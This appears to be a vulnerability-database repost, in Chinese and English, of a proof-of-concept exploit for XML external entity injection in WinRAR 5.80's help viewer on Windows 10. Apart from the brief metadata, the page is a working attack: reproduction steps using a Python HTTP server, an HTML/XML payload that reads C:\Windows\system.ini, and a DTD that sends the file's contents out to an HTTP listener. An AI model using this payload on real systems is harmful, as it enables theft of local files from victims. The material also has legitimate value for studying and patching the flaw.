winrar 5.80 External Entity Injection win10 - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1792491 漏洞类型
发布时间 2019-10-22 更新时间 2019-10-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019100142
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: winrar External Entity Injection
# Exploit Author: albalawi -s
# https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit

#https://twitter.com/test_app_______

poc video :https://www.youtube.com/watch?v=XpFvSHeVB7E

# POC

1- python -m SimpleHTTPServer  8000
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the html file to the window


html file

<htmlL>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>



==============================
start.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;